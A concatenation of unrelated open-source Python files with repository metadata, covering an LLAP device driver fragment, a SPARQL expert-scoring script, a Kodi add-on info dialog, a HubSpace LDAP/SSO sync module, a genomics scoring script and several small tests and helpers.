"""Return battery voltage."""
msg = 'BATT'
resp = self.send(msg, response=msg, timeout=timeout, retry=retry)
if resp is not None:
return resp[len(msg):]
return None
def devtype(self, timeout=1, retry=3):
"""Return LLAP device type."""
msg = 'DEVTYPE'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def devname(self, timeout=1, retry=3):
"""Return LLAP device name."""
msg = 'DEVNAME'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def hello(self, timeout=1, retry=3):
"""Send HELLO (ping) packet."""
msg = 'HELLO'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def ser(self, timeout=1, retry=3):
"""Return device serial number."""
msg = 'SER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def fver(self, timeout=1, retry=3):
"""Return device firmware version."""
msg = 'FVER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def reboot(self, timeout=1, retry=3):
"""Reboot the device."""
msg = 'REBOOT'
ret = self.send(msg, response=msg, timeout=timeout, retry=retry)
self.started = False
return ret
def chdevid(self, new_address, reboot=True, timeout=1, retry=3):
"""Change the device address."""
msg = 'CHDEVID%s' % new_address
ret = self.send(msg, response=msg, timeout=timeout, retry=retry)
if ret is None:
return False
if reboot:
ret = self.reboot()
self.address = new_address
return ret
def panid(self, new_panid, timeout=1, retry=3):
"""Change the device PAN id."""
msg = 'PANID%s' % new_panid
return self.send(msg, response=msg, timeout=timeout, retry=retry)
|
piit79/python-llap
|
llap/__init__.py
|
Python
|
gpl-2.0
| 9,687
|
# -*- coding: utf-8 -*-
# Utilidades varias (toolbox)
def synchronized(lock):
""" Synchronization decorator.
Usage:
import threading
lock = threading.Lock()
@synchronized(lock)
def function():
something synchronous
"""
def wrap(f):
def newFunction(*args, **kw):
with lock:
return f(*args, **kw)
return newFunction
return wrap
|
srlobo/slutils
|
slutils/utils.py
|
Python
|
gpl-2.0
| 441
|
import httplib2, urllib, json, re, os, csv, codecs
expert_results = []
sourcedir = "/Users/oliver/PycharmProjects/parse_comments/output_rev1_sub_windows"
outputdir = "/Users/oliver/PycharmProjects/fetch_expert_status"
outputdir_single = "/Users/oliver/PycharmProjects/fetch_expert_status/expert_single"
outputfile_experts = 'expert_results.csv'
document_i = 1 # todo: reset to '1' after debugging
csv_store = []
while document_i <= 61930: # wieder zurueckaendern auf 60000
try:
inputfile = '%s.csv' % (document_i)
os.chdir(sourcedir)
csvinput = codecs.open(inputfile, 'r', 'latin1')
#num_lines = sum(1 for line in csvinput)
#print(num_lines)
reader = csv.reader(csvinput, delimiter=';')
csv_row_count = 0
for row in reader:
csv_store.append(row)
except:
pass
document_i += 1
#print(len(csv_store))
comment_i = 0
first_iteration = 1
comment_i_indicator = 1
os.chdir(outputdir_single)
while comment_i <= len(csv_store): # wieder zurueckaendern auf 60000
try:
#comment_i_indicator = comment_i
expert_candidate = csv_store[comment_i][3]
source_document = csv_store[comment_i][2]
demo_i = csv_store[comment_i][0]
if first_iteration != 1:
if demo_i != demo_i_indicator:
outputfile_experts = '%s_expert.csv' % (demo_i_indicator)
with open(outputfile_experts, 'w', newline='', encoding='latin1') as output_experts:
writer = csv.writer(output_experts, delimiter=';')
writer.writerows(expert_results)
comment_i_indicator = 1
expert_results = []
first_iteration = 0
demo_i_indicator = demo_i
#expert_candidate = 'jb'
expert_candidate = expert_candidate.replace(' ', '_').replace('\\', '_').replace('|', '_').replace('#', '_').replace('"', '_').replace('^', '_').replace('<', '_').replace('>', '_').replace('{', '_').replace('}', '_').replace('[', '_').replace(']', '_').replace('%', '_').replace('`', '_').replace('�', '_').lower()
source_document = source_document.lower()
query = 'PREFIX :<http://www.w3.org/2002/07/owl#> PREFIX rdfs:<http://www.w3.org/2000/01/rdf-schema#> PREFIX ns:<http://purl.org/marl/ns#> PREFIX psys:<http://proton.semanticweb.org/protonsys#> PREFIX erlangen-crm:<http://erlangen-crm.org/120111/> PREFIX owl:<http://www.w3.org/2002/07/owl#> PREFIX xsd:<http://www.w3.org/2001/XMLSchema#> PREFIX rdf:<http://www.w3.org/1999/02/22-rdf-syntax-ns#> PREFIX pext:<http://proton.semanticweb.org/protonext#> PREFIX demoage:<http://www.m-e-g-a.org/ontologies/demoage#> SELECT DISTINCT ?expert_evidence WHERE {demoage:%s rdf:type erlangen-crm:E21_Person . demoage:%s erlangen-crm:P11i_participated_in ?x . ?x rdf:type erlangen-crm:E65_Creation . ?x erlangen-crm:P14_carried_out_by demoage:%s . ?x erlangen-crm:P2_has_type ?y. ?y erlangen-crm:P3_has_note ?expert_evidence }' % (expert_candidate, expert_candidate, expert_candidate)
repository = 'demoage'
endpoint = 'http://localhost:8080/openrdf-sesame/repositories/%s' % (repository)
print("POSTing SPARQL query")
params = { 'query': query}
headers = {
'content-type': 'application/x-www-form-urlencoded',
'accept': 'application/sparql-results+json'
}
(response, content) = httplib2.Http().request(endpoint, 'POST', urllib.parse.urlencode(params), headers=headers)
print("Sesame Response", response.status)
content = content.decode('utf-8')
#print(content)
#print(type(content))
try:
results = json.loads(content)
except:
pass
#print(results)
i = 0
expert_dict = []
while i <= 6:
expertstring = ''
try:
expertstring = results['results']['bindings'][i]['expert_evidence']['value']
except:
pass
expert_dict.append(str(expertstring))
i += 1
#print(expertstring)
#expert_match = re.search(r'_creation', expertstring)
#if expert_match:
# expert_value = 'expert'
#else:
# expert_value = ''
print_i = 0
while print_i <= i-1:
#print(expert_dict[print_i])
print_i += 1
# extracting the types of participation and setting the lookup tables which are to be used
use_lookup_table_graphics = 0 # default values
use_lookup_table_music = 0
use_lookup_table_tool = 0
use_lookup_table_texture = 0
use_lookup_table_engine = 0
use_lookup_table_code = 0
use_lookup_table_general = 0
aspect_select_i = 0
while aspect_select_i <= print_i-1:
if expert_dict[aspect_select_i] == 'graphics creation':
use_lookup_table_graphics = 1
if expert_dict[aspect_select_i] == 'music creation':
use_lookup_table_music = 1
if expert_dict[aspect_select_i] == 'tool creation':
use_lookup_table_tool = 1
if expert_dict[aspect_select_i] == 'texturing creation':
use_lookup_table_texture = 1
if expert_dict[aspect_select_i] == 'engine creation':
use_lookup_table_engine = 1
if expert_dict[aspect_select_i] == 'code creation':
use_lookup_table_code = 1
if expert_dict[aspect_select_i] == 'demosceneart production creation':
use_lookup_table_general = 1
aspect_select_i += 1
#*** defining the lookup tables for the aspects
#lookup table for graphics aspect
if use_lookup_table_graphics == 1:
lookup_table_graphics_aspects = ['effects', 'gfx', 'visuals', 'visual', 'graphics', '3d', 'animation', 'interface', 'rendering', '2d', 'graphic', 'models', 'particles', 'sprites', 'design', 'effect', 'colors', 'colours', 'color', 'scenes', 'fonts', 'fx', 'objects', 'camera', 'menu', 'raytracing', 'pictures', 'transitions', 'presentation', 'vector']
# lookup table for music aspect
if use_lookup_table_music == 1:
lookup_table_music_aspects = ['music', 'sound', 'audio', 'soundtrack', 'song', 'synth', 'musics', 'tune', 'tunes', 'sounds', 'mod', 'bass']
# lookup table for tool aspect
if use_lookup_table_tool == 1:
lookup_table_tool_aspects = []
# lookup table for texture aspect
if use_lookup_table_texture == 1:
lookup_table_texture_aspects = ['textures', 'texture']
# lookup table for engine aspect
if use_lookup_table_engine == 1:
lookup_table_engine_aspects = ['engine', 'speed']
# lookup table for code aspect
if use_lookup_table_code == 1:
lookup_table_code_aspects = ['code', 'filesize', 'coding', 'size', 'coded']
# lookup table for general aspect
if use_lookup_table_general == 1:
lookup_table_general_aspects = ['production', 'demo', 'prod', 'result', 'execution', 'in general', 'executed', 'intro', 'intros', 'concept', 'piece', 'direction', 'theme']
# *** Abgleich Kommentarinhalt und Ontologieinfo mittels Lookup Table
#source_document = 'The gfx on this prod are rly n1. Also the soundtrack and the filesize are impressive.'
matching_document_aspects = ''
if use_lookup_table_graphics == 1:
for aspect_string in lookup_table_graphics_aspects:
matches_aspect = re.search(aspect_string, source_document) #% (aspect_string)
if matches_aspect:
#print('graphics match: ', aspect_string)
matching_document_aspects += 'graphics,'
if use_lookup_table_music == 1:
for aspect_string in lookup_table_music_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('music match: ', aspect_string)
matching_document_aspects += 'music,'
if use_lookup_table_tool == 1:
for aspect_string in lookup_table_tool_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('tool match: ', aspect_string)
matching_document_aspects += 'tool,'
if use_lookup_table_texture == 1:
for aspect_string in lookup_table_texture_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('texture match: ', aspect_string)
matching_document_aspects += 'texture,'
if use_lookup_table_engine == 1:
for aspect_string in lookup_table_engine_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('engine match: ', aspect_string)
matching_document_aspects += 'engine,'
if use_lookup_table_code == 1:
for aspect_string in lookup_table_code_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('code match: ', aspect_string)
matching_document_aspects += 'code,'
if use_lookup_table_general == 1:
for aspect_string in lookup_table_general_aspects:
matches_aspect = re.search(aspect_string, source_document)
if matches_aspect:
#print('code match: ', aspect_string)
matching_document_aspects += 'general,'
expert_single = [demo_i, comment_i_indicator, expert_candidate, matching_document_aspects]
# expert_single als pickle speichern, Dateiname: %s_%s_expert
#doc_output = '%s_%s_expert.csv' % (str(demo_i), str(comment_i_indicator))
#with open(doc_output, 'w', newline='', encoding='latin1') as output_single_expert:
"""with open(doc_output, 'w', encoding='latin1') as output_single_expert:
writer_single = csv.writer(output_single_expert, delimiter=';')
writer_single.writerows(str(expert_single[3]))"""
expert_results.append(expert_single)
#for item in matching_document_aspects: # Aspekte, in welchen dem Autor ein erhöhtes Gewicht zugewiesen werden sollte
# print(item)
#print(expert_results)
print(expert_single)
comment_i_indicator += 1
except:
#print('error:', comment_i)
pass
comment_i += 1
#os.chdir(outputdir)
#with open(outputfile_experts, 'w', newline='', #encoding='latin1') as output_experts:
# writer = csv.writer(output_experts, delimiter=';')
# writer.writerows(expert_results)
|
olivergoetze/demoscene-sentiment-classifier
|
fetch_experts_status/fetch_from_ontology.py
|
Python
|
gpl-2.0
| 10,972
|
# -*- coding: utf-8 -*-
import pyxbmct
import xbmcaddon
import xbmc
import xbmcgui
from random import choice
from sport365 import getUrl as mod
ADDON = xbmcaddon.Addon()
FANART = ADDON.getAddonInfo('fanart')
ICON = ADDON.getAddonInfo('icon')
NAME = ADDON.getAddonInfo('name')
dialog = xbmcgui.Dialog()
class Prompt(pyxbmct.AddonDialogWindow):
def __init__(self):
# noinspection PyArgumentList
super(Prompt, self).__init__('Sports365 News - Updates - Help')
self.changelog_button = None
self.disclaimer_button = None
self.close_button = None
self.external_label = None
self.description = None
self.donation_button = None
self.debrid_button = None
self.facebook_button = None
self.twitter_button = None
self.setGeometry(854, 480, 8, 5)
self.set_controls()
self.connect(pyxbmct.ACTION_NAV_BACK, self.close)
self.set_navigation()
def set_controls(self):
image = pyxbmct.Image(FANART, aspectRatio=2)
self.placeControl(image, 0, 0, 5, 5)
# Note
self.description = pyxbmct.Label('Developer: Bugatsinho', alignment=2)
self.placeControl(self.description, 5, 0, 2, 5)
# Telegram Button
self.tele_button = pyxbmct.Button('[COLOR gold]Telegram Link[/COLOR]')
self.placeControl(self.tele_button, 6, 0, 1, 1)
self.connect(self.tele_button, lambda: open_web_browser('http://bit.ly/bug_telegram'))
# Paypal button
self.debrid_button = pyxbmct.Button('[COLOR gold]RDebrid Link[/COLOR]')
self.placeControl(self.debrid_button, 6, 1, 1, 1)
self.connect(self.debrid_button, lambda: open_web_browser('http://bit.ly/RDedlink'))
# Donation button
self.donation_button = pyxbmct.Button('[COLOR gold]Donation Link[/COLOR]')
self.placeControl(self.donation_button, 6, 2, 1, 1)
self.connect(self.donation_button, lambda: open_web_browser('https://pastebin.com/raw/9J1KGKsj'))
# Twitter button
self.twitter_button = pyxbmct.Button('[COLOR gold]Twitter Link[/COLOR]')
self.placeControl(self.twitter_button, 6, 3, 1, 1)
self.connect(self.twitter_button, lambda: open_web_browser('https://twitter.com/bugatsinho'))
# GitHub button
self.github_button = pyxbmct.Button('[COLOR gold]GitHub Link[/COLOR]')
self.placeControl(self.github_button, 6, 4, 1, 1)
self.connect(self.github_button, lambda: open_web_browser('https://github.com/bugatsinho/bugatsinho.github.io/tree/master/plugin.video.sport365.live'))
# Close button
self.close_button = pyxbmct.Button('[COLOR gold]CLOSE[/COLOR]')
self.placeControl(self.close_button, 7, 2)
self.connect(self.close_button, self.close)
# Changelog button
self.changelog_button = pyxbmct.Button('[COLOR gold]NEWS & UPDATES[/COLOR]')
self.placeControl(self.changelog_button, 7, 0, 1, 2)
self.connect(self.changelog_button, lambda: news())#https://pastebin.com/raw/mpgxNy2V
# Disclaimer button
self.disclaimer_button = pyxbmct.Button('[COLOR gold]DISCLAIMER[/COLOR]')
self.placeControl(self.disclaimer_button, 7, 3, 1, 2)
self.connect(self.disclaimer_button, lambda: disclaimer())
def set_navigation(self):
self.tele_button.controlRight(self.debrid_button)
self.tele_button.controlDown(self.changelog_button)
self.donation_button.controlRight(self.twitter_button)
self.donation_button.controlDown(self.close_button)
self.donation_button.controlLeft(self.debrid_button)
self.debrid_button.controlLeft(self.tele_button)
self.debrid_button.controlDown(self.close_button)
self.debrid_button.controlRight(self.donation_button)
self.github_button.controlDown(self.disclaimer_button)
self.github_button.controlLeft(self.twitter_button)
self.twitter_button.controlLeft(self.donation_button)
self.twitter_button.controlDown(self.disclaimer_button)
self.twitter_button.controlRight(self.github_button)
self.close_button.controlLeft(self.changelog_button)
self.close_button.controlRight(self.disclaimer_button)
self.close_button.controlUp(self.donation_button)
self.changelog_button.controlRight(self.close_button)
self.changelog_button.controlUp(self.tele_button)
self.disclaimer_button.controlLeft(self.close_button)
self.disclaimer_button.controlUp(choice([self.github_button, self.twitter_button]))
self.setFocus(self.close_button)
def welcome():
window = Prompt()
window.doModal()
del window
def disclaimer():
try:
text = xbmcaddon.Addon().getAddonInfo('disclaimer').decode('utf-8')
except (UnicodeEncodeError, UnicodeDecodeError, AttributeError):
text = xbmcaddon.Addon().getAddonInfo('disclaimer')
dialog.textviewer('Sports365' + ' ' + 'Disclaimer', text)
def news():
_news = mod('https://pastebin.com/raw/pf1Mkg73')
dialog.textviewer('Sports365' + ' ' + 'News & Updates', _news.encode('utf-8'))
def android_activity(url, package=''):
if package:
package = '"' + package + '"'
return xbmc.executebuiltin('StartAndroidActivity({0},"android.intent.action.VIEW","","{1}")'.format(package, url))
def open_web_browser(url):
if xbmc.getCondVisibility('system.platform.android'):
return android_activity(url)
else:
import webbrowser
return webbrowser.open(url)
|
repotvsupertuga/tvsupertuga.repository
|
plugin.video.sport365.live/newsbox.py
|
Python
|
gpl-2.0
| 5,581
|
import logging
import time
import turbogears.config
import hubspace.config
from turbogears.identity.soprovider import SqlObjectIdentityProvider
import thread
import threading
import base64
import sendmail
try:
SYNC_ENABLED = turbogears.config.config.configs['syncer']['sync']
except Exception, err:
print err
SYNC_ENABLED = False
tls = threading.local()
applogger = logging.getLogger("hubspace")
SSOIdentityProvider = SqlObjectIdentityProvider
_cp_filters = []
def setupSync(): pass
def sendRollbackSignal(): pass
class SyncerError(Exception):
"""
Raise this error when syncer transaction fails
"""
if SYNC_ENABLED:
import syncer
import syncer.client
import syncer.config
import syncer.utils
import syncer.helpers
import syncer.helpers.ldap
import cherrypy
from cherrypy.filters.basefilter import BaseFilter
import hubspace.model as model
syncer.config.host = turbogears.config.config.configs['syncer']['syncer_host']
syncer.config.port = turbogears.config.config.configs['syncer']['syncer_port']
syncer.config.__syncerdebug__ = True
syncer.config.reload()
_sessions = dict()
sessiongetter = lambda: _sessions
syncerclient = syncer.client.SyncerClient("hubspace", sessiongetter)
fail_on_syncerror = False
class LazyCall(object):
def __init__(self, f):
self.f = f
def __call__(self, *args, **kw):
self.args = args
self.kw = kw
def run(self):
return self.f(*self.args, **self.kw)
class LazySyncerClient(list):
def __init__(self, client):
self._client =client
def __getattr__(self, name):
lazy_call = LazyCall(getattr(self._client, name))
self.append(lazy_call)
return lazy_call
def run_all(self):
self.results = [x.run() for x in self]
return self.results
class SSOIdentityProvider(SqlObjectIdentityProvider):
def validate_identity(self, user_name, password, visit_key):
iden = super(SSOIdentityProvider, self).validate_identity(user_name, password, visit_key)
applogger = logging.getLogger("hubspace")
if iden and not syncerclient.isSyncerRequest(cherrypy.request.headers.get("user-agent", None)):
cookies = syncer.utils.convertCookie(cherrypy.request.simple_cookie)
try:
ret = syncerclient.onUserLogin(user_name, password, cookies)
t_id, res = ret
except ValueError:
print ret
# a warning here
return iden
except Exception, err:
print err
# a warning here
return iden
if not syncerclient.isSuccessful(res):
print syncer.client.errors.res2errstr(res)
else:
for v in res.values():
try:
sso_cookies = v['result']
c = syncer.utils.convertCookie(sso_cookies)
cherrypy.response.simple_cookie.update(c)
except:
print "skipping ", v['appname']
# help issue reporter
try:
user = iden.user
uinfo = "|".join((user.first_name, user.last_name, user.homeplace.name, user.email_address))
cherrypy.response.simple_cookie['uinfo'] = base64.b64encode(uinfo)
cherrypy.response.simple_cookie['uinfo']['domain'] = turbogears.config.config.configs['global']['session_filter.cookie_domain']
except Exception, err:
# dont stop on any error
print err
return iden
# http://www.cherrypy.org/wiki/UpgradeTo22
class TransactionCompleter(BaseFilter):
def on_start_resource(self, *args, **kw):
tls.syncer_trs = []
tls.syncerclient = LazySyncerClient(syncerclient)
def on_end_resource(self, *args, **kw):
tls.syncerclient.run_all()
if hasattr(tls, 'syncer_trs') and tls.syncer_trs:
syncerclient.completeTransactions(tuple(tls.syncer_trs))
_cp_filters.append(TransactionCompleter())
def sendRollbackSignal():
if hasattr(tls, "syncer_trs") and tls.syncer_trs:
to_rollback = tls.syncer_trs
tls.syncer_trs = []
if to_rollback:
syncerclient.rollbackTransactions(tuple(reversed(to_rollback)))
def signon():
u = turbogears.config.config.configs['syncer']['hubspaceadminuid']
p = turbogears.config.config.configs['syncer']['hubspaceadminpass']
applogger.info("syncer: signon begin: %s" % u)
ret = syncerclient.onSignon(u, p)
tr_id, res = ret
if syncerclient.isSuccessful(res):
syncerclient.setSyncerToken(res['sessionkeeper']['result'])
applogger.info("syncer: signon successful: %s" % u)
print msg
return True
msg = "Syncer signon failed: %s" % res
applogger.warn(msg)
print msg
msg = syncer.client.errors.res2errstr(res)
applogger.warn(msg)
print msg
def signonloop():
print "this is the signonloop"
while not signon():
time.sleep(7)
## All sync operations ##
from sqlobject.events import listen, RowUpdateSignal, RowCreatedSignal, RowDestroySignal
def checkSyncerResults(f):
def wrap(*args, **kw):
ret = f(*args)
f_name = getattr(f, '__name__', str(f))
applogger.debug("syncer: %s-> %s" % (f_name, ret))
if ret:
t_id, res = ret
if res and not syncerclient.isSuccessful(res):
if fail_on_syncerror:
raise SyncerError("syncer backend error")
return
if t_id > 0:
tls.syncer_trs.append(t_id)
print "syncer_trs.append", t_id
return ret
return wrap
def checkReqHeaders(f):
def wrap(*args, **kw):
try:
if not syncerclient.isSyncerRequest(cherrypy.request.headers.get("user-agent", None)):
return f(*args, **kw)
except AttributeError:
# outside CheeryPy request which is fine
return f(*args, **kw)
return wrap
@checkReqHeaders
@checkSyncerResults
def usr_add_listener(kwargs, post_funcs):
instance = kwargs['class'].get(kwargs['id'])
return tls.syncerclient.onUserAdd(instance.id)
@checkSyncerResults
@checkReqHeaders
def usr_updt_listener(instance, kwargs):
if instance.user_name == turbogears.config.config.configs['syncer']['hubspaceadminuid']:
return
#if 'password' in kwargs and kwargs.get('password') != instance.password:
# return tls.syncer.onUserPasswordMod(kw['password'])
return tls.syncerclient.onUserMod(instance.id)
@checkSyncerResults
@checkReqHeaders
def group_join_listener(kwargs, post_funcs):
instance = kwargs['class'].get(kwargs['id'])
return tls.syncerclient.onGroupJoin(instance.user.id, instance.group.id)
@checkSyncerResults
@checkReqHeaders
def group_leave_listener(instance, post_funcs):
return tls.syncerclient.onGroupLeave(instance.user.id, instance.group.id)
def setupSync():
# in some situations it's not desired to have sync on right from the server boot. Like in new setups we may want
# to create initial users before we start syncing.
print "setup: Enabling sync"
listen(usr_add_listener, model.User, RowCreatedSignal)
listen(usr_updt_listener, model.User, RowUpdateSignal)
listen(group_join_listener, model.UserGroup, RowCreatedSignal)
listen(group_leave_listener, model.UserGroup, RowDestroySignal)
thread.start_new(signonloop, ()) # with ldap disable this is required
# @checkSyncerResults
# @checkReqHeaders
# def usr_updt_listener(instance, kwargs):
# if instance.user_name == turbogears.config.config.configs['syncer']['hubspaceadminuid']: return
# kw = dict ([(k, v) for (k,v) in kwargs.items() if getattr(instance, k) != v])
# if kw:
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(instance, kw)
# if mod_list:
# return syncerclient.onUserMod(instance.user_name, mod_list)
#
# @checkSyncerResults
# @checkReqHeaders
# def hub_updt_listener(instance, kwargs):
# kw = dict ([(k, v) for (k,v) in kwargs.items() if getattr(instance, k) != v])
# mod_list = syncer.helpers.ldap.object_maps['hub'].toLDAP(instance, kw)
# if mod_list:
# return syncerclient.onHubMod(instance.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def usr_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(instance)
# return syncerclient.onUserAdd(instance.user_name, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def hub_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['hub'].toLDAP(instance, {})
# return syncerclient.onHubAdd(instance.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def grp_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['role'].toLDAP(instance, {})
# return syncerclient.onRoleAdd(instance.place.id, instance.level, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def grp_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['group'].toLDAP(instance, kwargs)
# return syncerclient.onGroupMod(kwargs['group_name'], mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['policy'].toLDAP(instance, {})
# return syncerclient.onAccesspolicyAdd(instance.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['policy'].toLDAP(instance, kwargs)
# return syncerclient.onAccesspolicyMod(instance.id, instance.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_del_listener(instance, post_funcs):
# return syncerclient.onAccesspolicyDel(instance.id, instance.location.id)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['opentimes'].toLDAP(instance, {})
# return syncerclient.onOpentimesAdd(instance.policy.id, instance.policy.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['opentimes'].toLDAP(instance, kwargs)
# return syncerclient.onOpentimesMod(instance.id, instance.policy.id, instance.policy.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_del_listener(instance, post_funcs):
# return syncerclient.onOpentimesDel(instance.id, instance.policy.id, instance.policy.location.id)
#
# #@checkSyncerResults
# def tariff_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# if instance.resource.type != 'tariff':
# return
# tariff_id = instance.resource.id
# place_id = instance.resource.place.id
# username = instance.user.user_name
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(None, dict(tariff_id = tariff_id, hubId = place_id))
# t_id, res = syncerclient.onUserMod(username, mod_list)
# if not syncerclient.isSuccessful(res):
# body = """
# LDAP Error: Setting Tariff for user %(username)s has failed.
# Below is the data send to syncer for the modificarion:
# Hub id: %(place_id)s
# Change data: %(mod_list)s
# """ % locals()
# sendmail.sendmail(to="world.tech.space@the-hub.net", sender="noreply@the-hub.net", \
# cc="shekhar.tiwatne@the-hub.net", subject="LDAP Error report", body=body)
# return t_id, res
#
# @checkReqHeaders
# @checkSyncerResults
# def add_user2grp_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# if instance.group.place:
# onAssignRoles = checkSyncerResults(syncerclient.onAssignRoles)
# onAssignRoles(instance.user.user_name, instance.group.place.id, instance.group.level)
# if instance.group.group_name == "superuser":
# mod_list = syncer.helpers.ldap.object_maps['group'].toLDAP(instance)
# return syncerclient.onGroupMod("superusers", mod_list) # <- it's superusers at ldap
#
# @checkReqHeaders
# @checkSyncerResults
# def tariff_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['tariff'].toLDAP(instance)
# return syncerclient.onTariffAdd(instance.place.id, mod_list)
#
# ## /sync operations
#
# def setupLDAPSync():
# # in some situations it's not desired to have sync on right from the server boot. Like in new setups we may want
# # to create initial users before we start syncing.
# print "setup: Enabling LDAP sync"
# listen(usr_add_listener, model.User, RowCreatedSignal)
# listen(usr_updt_listener, model.User, RowUpdateSignal)
# listen(hub_add_listener, model.Location, RowCreatedSignal)
# listen(hub_updt_listener, model.Location, RowUpdateSignal)
# listen(grp_add_listener, model.Group, RowCreatedSignal)
# listen(grp_updt_listener, model.Group, RowUpdateSignal)
# listen(add_user2grp_listener, model.UserGroup, RowCreatedSignal)
# listen(accesspolicy_updt_listener, model.AccessPolicy, RowUpdateSignal)
# listen(accesspolicy_add_listener, model.AccessPolicy, RowCreatedSignal)
# listen(accesspolicy_del_listener, model.AccessPolicy, RowDestroySignal)
# listen(opentimes_add_listener, model.Open, RowCreatedSignal)
# listen(opentimes_updt_listener, model.Open, RowUpdateSignal)
# listen(opentimes_del_listener, model.Open, RowDestroySignal)
# listen(tariff_listener, model.RUsage, RowCreatedSignal)
# listen(tariff_add_listener, model.Resource, RowCreatedSignal)
#
# thread.start_new(signonloop, ())
|
thehub/hubspace
|
hubspace/sync/core.py
|
Python
|
gpl-2.0
| 15,261
|
#!/usr/bin/env python
#=========================================================================
# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public
# License (GPL) version 3, as described at www.opensource.org.
# Copyright (C)2016 William H. Majoros (martiandna@gmail.com).
#=========================================================================
from __future__ import (absolute_import, division, print_function,
unicode_literals, generators, nested_scopes, with_statement)
from builtins import (bytes, dict, int, list, object, range, str, ascii,
chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)
# The above imports should allow this program to run in both Python 2 and
# Python 3. You might need to update your version of module "future".
import sys
import os
import math
import ProgramName
from Pipe import Pipe
from FastaReader import FastaReader
MUMMIE=os.environ["MUMMIE"]
if(len(sys.argv)!=4):
exit(ProgramName.get()+" <rescaled-scores.txt> <shendure-scores.txt> <fastb-dir>\n")
(rescaledFile,shendureFile,fastbDir)=sys.argv[1:]
def arithmeticMean(seq,hexHash):
L=len(seq)
end=L-5
sum=0.0
for i in range(end):
hex=seq[i:i+6]
hexScore=hexHash[hex]
sum+=hexScore
mean=float(sum)/float(end)
return mean
def product(seq,hexHash):
L=len(seq)
end=L-5
product=1.0
for i in range(end):
hex=seq[i:i+6]
hexScore=hexHash[hex]
product*=hexScore
product=product**(1.0/float(end))
return product
shendureHash={}
with open(shendureFile,"rt") as IN:
for line in IN:
fields=line.rstrip().split()
if(len(fields)!=2): continue
(hex,score)=fields
shendureHash[hex]=float(score)
#print(hex,float(score))
rescaledHash={}
with open(rescaledFile,"rt") as IN:
for line in IN:
fields=line.rstrip().split()
if(len(fields)!=2): continue
(hex,score)=fields
rescaledHash[hex]=float(score)
#print(hex,math.log(float(score)))
files=os.listdir(fastbDir)
for file in files:
(defline,seq)=FastaReader.firstSequence(fastbDir+"/"+file)
length=len(seq)
if(length<6): continue
shendureScore=arithmeticMean(seq,shendureHash)
rescaledScore=product(seq,rescaledHash)
print(shendureScore,rescaledScore,sep="\t")
|
ReddyLab/1000Genomes
|
compare-hex-scores-LR.py
|
Python
|
gpl-2.0
| 2,341
|
#!/usr/bin/env python
import unittest
from pykeg.core import keg_sizes
class KegSizesTest(unittest.TestCase):
def test_match(self):
match = keg_sizes.find_closest_keg_size
self.assertEqual("other", match(100.0))
self.assertEqual("other", match(100000000.0))
self.assertEqual("sixth", match(19570.6))
self.assertEqual("sixth", match(19470.6))
self.assertEqual("other", match(19460.6))
if __name__ == "__main__":
unittest.main()
|
Kegbot/kegbot-server
|
pykeg/core/keg_sizes_test.py
|
Python
|
gpl-2.0
| 488
|
#! /usr/bin/python2
import os
import MySQLdb
class MySQL_conn:
def __init__(self, hostname, database, username, password):
self.connect = MySQLdb.connect(host = hostname,
db = database,
user = username,
passwd = password)
self.cursor = self.connect.cursor()
def connection(self):
return self.connect
|
avoorhis/mbl_sequencing_pipeline
|
pipeline/mysql_conn.py
|
Python
|
gpl-2.0
| 462
|
"""API docs tests."""
from django.test import TestCase
from rest_framework import status
class APIDocsTest(TestCase):
"""Test the access to the API docs."""
def test_docs_url(self):
response = self.client.get('/api/docs/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
oser-cs/oser-website
|
tests/test_docs.py
|
Python
|
gpl-3.0
| 309
|
from ovito import *
import sys
sys.exit(2)
|
srinath-chakravarthy/ovito
|
tests/scripts/test_suite/system_exit.py
|
Python
|
gpl-3.0
| 43
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*-_
############################
# File Name: webFrame.py
# Author: lza
# Created Time: 2016-10-24 15:42:40
############################
